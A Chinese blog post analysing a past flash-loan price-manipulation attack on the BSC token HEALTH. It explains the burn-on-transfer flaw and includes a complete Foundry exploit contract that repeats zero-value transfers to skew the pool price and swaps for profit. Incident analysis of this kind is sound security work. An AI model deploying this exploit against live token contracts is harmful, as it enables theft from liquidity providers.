价格操纵——HEALTH

最新推荐文章于 2024-08-15 16:41:36 发布
最新推荐文章于 2024-08-15 16:41:36 发布
阅读量93 收藏
点赞数
分类专栏: 链上安全事件分析 文章标签: 区块链 智能合约 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78046362/article/details/130790581
版权
文章详细描述了一次针对智能合约的闪电贷攻击事件,攻击者通过操纵HEALTH代币价格,利用不恰当的函数逻辑,在PancakeSwap上进行交易,最终获利16个WBNB。文章强调了智能合约在开发时需要对业务逻辑进行严格验证以防止此类攻击。
摘要由CSDN通过智能技术生成

文章目录


攻击者通过操纵价格,获得了16个WBNB的利润。

事件基本情况

tx: 0xae8ca9dc8258ae32899fe641985739c3fa53ab1f603973ac74b424e165c66ccf
区块链:bsc
发送者: 0xde78112ff006f166e4ccfe1dfe4181c9619d3b5d
受害者: 0x32B166e082993Af6598a89397E82e123ca44e74E
攻击合约: 0x80e5fc0d72e4814cb52c16a18c2f2b87ef1ea2d4
调用函数: 0x293e15df
区块高度: 22337426
漏洞点:不恰当的函数逻辑。

hacker攻击流程

  1. 调用闪电贷40个WBNB
  2. 在回调函数中
    1. 授权40个WBNB给PancakeSwap: Router v2合约。
    2. 调用PancakeSwap的swapExactTokensForTokensSupportingFeeOnTransferTokens(支持收税的根据精确的token交换尽量多的token方法)用WBNB换取Health代币30个
    3. 循环执行HEALTH代币的transfer方法,发送HEALTH代币给sender
    4. 调用PancakeSwap的swapExactTokensForTokensSupportingFeeOnTransferTokens用HEALTH换取WBNB代币56个。
    5. 还钱40个WBNB给闪电贷,攻击者还有16个WBNB
    6. 将钱发送给sender

因为在每次调用transfer的时候uniswapV2Pair按照总数的1/1000的token进行销毁,攻击者重复调用transfer,造成了价格偏差,然后获利。

流程图如下

请添加图片描述
请添加图片描述

漏洞方法如图
请添加图片描述

攻击点复刻方式

  1. 创建攻击合约
  2. 在攻击函数中执行闪电贷,
  3. 在回调函数中循环执行transfer发送0个HEAlTH给sender,造成价格倾斜,然后用HEALTH兑换WBNB, 最后发送WBNB给sender

攻击模拟结果图

请添加图片描述

事件总结

 在编写智能合约的时候一定要对业务逻辑进行反复验证,防止出现被闪电贷进行放大攻击。

攻击代码

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;

import "forge-std/Test.sol";
import "./UniversalInterface.sol";

// 定义常量
address constant WBNB = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c;
address constant HEALTH = 0x32B166e082993Af6598a89397E82e123ca44e74E;
address constant ROUTER = 0x10ED43C718714eb63d5aA57B78B54704E256024E;
address constant FLOAN = 0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4;
uint256 constant BlockNumber = 22337425;

// 定义调用的接口
interface DPPAdvanced {
    function flashLoan(
        uint256 baseAmount,
        uint256 quoteAmount,
        address assetTo,
        bytes calldata data
    ) external;
}

// 攻击合约
contract Exploit is Test{

// 设置攻击环境
    function setUp() public {
        vm.createSelectFork("bsc", BlockNumber);
        vm.label(HEALTH, "HEALTH");
        // vm.label(victim, "victim");
    }

// 攻击函数
    function testAttack() public {
        IERC20(WBNB).approve(address(ROUTER), type(uint).max);
        IERC20(HEALTH).approve(address(ROUTER), type(uint).max);
        console.log("WBNB owned before attack:", IERC20(WBNB).balanceOf(address(this)));
        // 调用闪电贷 40000000000000000000
        DPPAdvanced(FLOAN).flashLoan(40000000000000000000,0,address(this), "0x61");
        console.log("WBNB owned after attack:", IERC20(WBNB).balanceOf(address(this)));

    }

// 回调函数
    function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) public {

        // 查看合约拥有多少WBNB
        uint256 loanWBNB = IERC20(WBNB).balanceOf(address(this));
        console.log("flashloan money :", loanWBNB);

        // 将WBNB兑换成HEALTH
        WBNBToHEALTH();

        // 循环执行transfer
        for(int i = 0; i < 1000; i++){
            IERC20(HEALTH).transfer(address(this), 0);
        }

        // 将HEALTH兑换成WBNB
        HEALTHTOWBNB();

        // 归还闪电贷
        IERC20(WBNB).transfer(FLOAN, loanWBNB);
    }

    function WBNBToHEALTH() internal {
        address[] memory path = new address[](2);
        path[0] = address(WBNB);
        path[1] = address(HEALTH);
        IPancakeRouter02(ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens(
            IERC20(WBNB).balanceOf(address(this)),
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function HEALTHTOWBNB() internal {
        address[] memory path = new address[](2);
        path[0] = address(HEALTH);
        path[1] = address(WBNB);
        IPancakeRouter02(ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens(
            IERC20(HEALTH).balanceOf(address(this)),
            0,
            path,
            address(this),
            block.timestamp
        );
    }
}

感觉对有帮助的可以点个赞,谢谢♥;如果喜欢的话可以订阅,我会持续更新合约漏洞事件

陵野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安卓Android源码——Health.zip
10-13
【标题】:“安卓Android源码——Health.zip”揭示了对Android操作系统内核的深入理解,尤其是与健康应用相关的部分。这个压缩包包含了构建一个Android应用的基本组成部分,这为我们提供了研究和学习Android应用开发...
Defi中的价格操纵攻击
m0_53689197的博客
04-13 257
Defi中的价格操纵攻击
最全面学习夹子智能机器人初级第二篇《PanCakeSwap V2》
qq_59591392的博客
03-31 8693
路由器02 由于路由器是无状态的并且不持有代币余额,因此可以在必要时安全且无需信任地更换它们。如果发现了更有效的智能合约模式,或者需要额外的功能,则可能会发生这种情况。出于这个原因,路由器的版本号从 开始01。这是当前推荐的版本 代码 UniswapV2Router02.sol 地址 UniswapV2Router02部署在0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D以太坊主网上,以及Ropsten、Rinkeby、Görli和Kovan测试网。它是
新版本变更——Pancakeswap V2解读
m0_56203513的博客
04-27 6721
自从UNI宣布5月即将上线V3版本之后,最近很多知名的DEFI协议也宣布推出新的版本。而其中最受瞩目的,必定也是UNI的直接竞争对手PANCAKE。 PANCAKE最近几天开始更新到V2版本,并进行流动性迁移。咱们先看看这V2版的迁移方式:旧版 V1 OLD先把 LP Token 从 Farm (农场) 中全部提出。再到「Trade」->「Liquidity」将 LP Token 换回你所提供的流动性 需注意下面的标签切换是在 V1 OLD。接著,再切换「Version」到「New」。重新存入你想提供
S2指导学习1——Health
02-20
【标题】"S2指导学习1——Health"指的是一个针对S2阶段(通常指的是软件开发的第二阶段,可能涉及深入学习或系统设计)的学习资源,主题聚焦于“健康”领域。这可能是关于如何利用信息技术来改善健康管理和医疗服务...
mysql_health:MySQL 健康检查脚本
06-20
`mysql_health` 脚本就是这样一个工具,专为MySQL数据库设计,用于系统地检测数据库的健康状况。 该脚本是用Perl编程语言编写的,Perl是一种功能强大的文本处理和脚本编写语言,常用于系统管理和自动化任务。在使用...
health:Nextcloud健康应用
08-03
Nextcloud健康应用是一款专为个人健康管理设计的软件,它整合在Nextcloud平台上,让你能够方便地追踪和管理自己的健康状况。版本1.2.1带来了更稳定和优化的体验,利用了Nextcloud平台的安全和可靠性,确保你的健康...
Introduction to the Health Physics
03-08
Health Physics Textbooks. 醫學物理經典教科書。 Contents: 1. Introduction/1 2. Review of Physical Principles/3 3. Atomic and Nuclear Structure/59 4. Radiation Sources/85 5. Interaction of Radiation ...
区块链+金融服务】供应链金融平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 185
四方精创基于 FISCO BCOS 设计了供应链金融平台,利用区块链多中心、不可篡改、不可抵赖、可追溯的特性, 在供应链生态企业间实现信用传递。
Web3入门指南:了解去中心化互联网的基础知识
最新发布
weixin_44672358的博客
08-15 389
Web3作为互联网的未来发展方向,正在引领着数字化时代的新篇章。通过去中心化、智能合约和数字身份技术,Web3不仅提升了互联网的安全性和隐私保护,还为金融、艺术和社交领域带来了新的应用机会。尽管面临技术复杂性、法规监管和网络安全等挑战,Web3技术的发展前景依然广阔。随着技术的不断演进和应用的逐步推广,Web3将为我们创造一个更加开放、公平和安全的数字世界。
区块链+金融服务】企链通金融服务平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 145
深圳市企企通科技积极响应国家政策,为企业引入基于 FISCO BCOS 区块链技术的供应链金融服务。
区块链和人工智能哪个更有前景?
加密社的博客
08-15 548
人工智能正在塑造当下,而区块链则锚定着未来的信任基石。
区块链+金融服务】机构间对账平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 128
机构间对账平台基于 FISCO BCOS 研发,将部分业务的资金信息和交易信息等作为副本旁路上链存储,用于微众银行与合作行的对账工作。
ITL-Internet Technology Letters
刘大猫
08-12 413
Internet Technology Letters本期旨在涵盖所有用于提高物联网性能的新兴或现代学习算法。在此背景下,我们打算收集有关物联网学习进展的研究论文。强烈鼓励与机器学习、计算智能、概率学习、统计学习、深度学习、联邦学习、因果关系、认知、强化学习、优化、区块链、5G/6G 或其他解决方案相关的论文,尤其是针对未来物联网应用的论文。
DeFi 协议应提供多类封装型比特币, wBTC 不应作为唯一选择
TechubNews的博客
08-14 568
孙宇晨在控制 TUSD 之后,其运营流程和透明度出现了恶化,前管理团队离职,实施储备金证明中断,在赎回服务中造成 TUSD 多次严重脱钩,以及孙宇晨关联的 RWA 项目声称持有美国国债储备,但没有提供明确的审计或者证据。上,已支持 wBTC 与 dlcBTC 交易品种,产品分为面向散户的,旨在降低准入门槛的日内到期期权,以及面向专业投资者的美式期权,提供实物交割模式和差额利润交割模式两种交割模式来适配持续上涨行情和震荡行情。近期,关于 wBTC 项目控制权转移的问题在社区内引起了广泛的讨论和担忧。
当前IT行业10大热门细分技术方向,哪一个更适合你?
文章主要涉及嵌入式软件开发、测试、项目管理等,欢迎交流,共同进步。
08-12 665
IT行业,即信息技术(Information Technology)行业,是一个广泛而多样的领域,涵盖了与信息的产生、收集、存储、处理、传输和应用相关的所有技术和服务。这个行业是现代社会中不可或缺的一部分,它利用计算机技术和通信技术来设计、开发、安装和实施信息系统及应用软件,以满足个人、企业和政府等组织的需求。广义上的IT行业划分范围很大,今天就来盘点一下,当前IT行业中有哪些比较热门的细分技术方向。以上就是当前IT行业10大热门细分技术方向,代表了当前IT行业的发展趋势。
重塑商业生态:技术驱动下的批发供应系统开发与革新
qq_27313987的博客
08-13 398
在当今这个快速变化的商业环境中,批发供应系统作为连接生产商、分销商与零售商的关键纽带,其效率与智能化水平直接影响着整个供应链的运作效率与市场竞争力。随着信息技术的飞速发展,特别是大数据、云计算、人工智能(AI)以及物联网(IoT)等前沿技术的深度融合,批发供应系统正经历着一场前所未有的技术革新,为传统商业模式带来了颠覆性的变化。
区块链+金融服务】中国银联区块链可信存证服务 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-14 866
中国银联充分发挥清算组织的平台角色,通过联通司法体系,以 FISCO BCOS 区块链技术为底层支撑,采取哈希 值校验、可信时间戳、电子签名和公证存证结合的方式构建区块链可信存证服务,为金融业务中的电子数据提供存证、出证、核验等能力,保障电子证据可用、可信、可靠,满足金融管理部门监督检查和司法机关调查取证的要求。
George Danezis谈为Sui开发Mysticeti
Sui_Network的博客
08-12 512
Mysten Labs的首席科学家解释了Mysticeti的开发过程及其对用户的意义。
如何解决health HEALTH_WARN
06-13
"health HEALTH_WARN"是Elasticsearch中的一个警告,它意味着集群的健康状况被评为黄色。这通常是由于某些节点不可用或磁盘空间不足等因素引起的。 要解决此问题,需要找出导致黄色健康状态的根本原因。可以通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值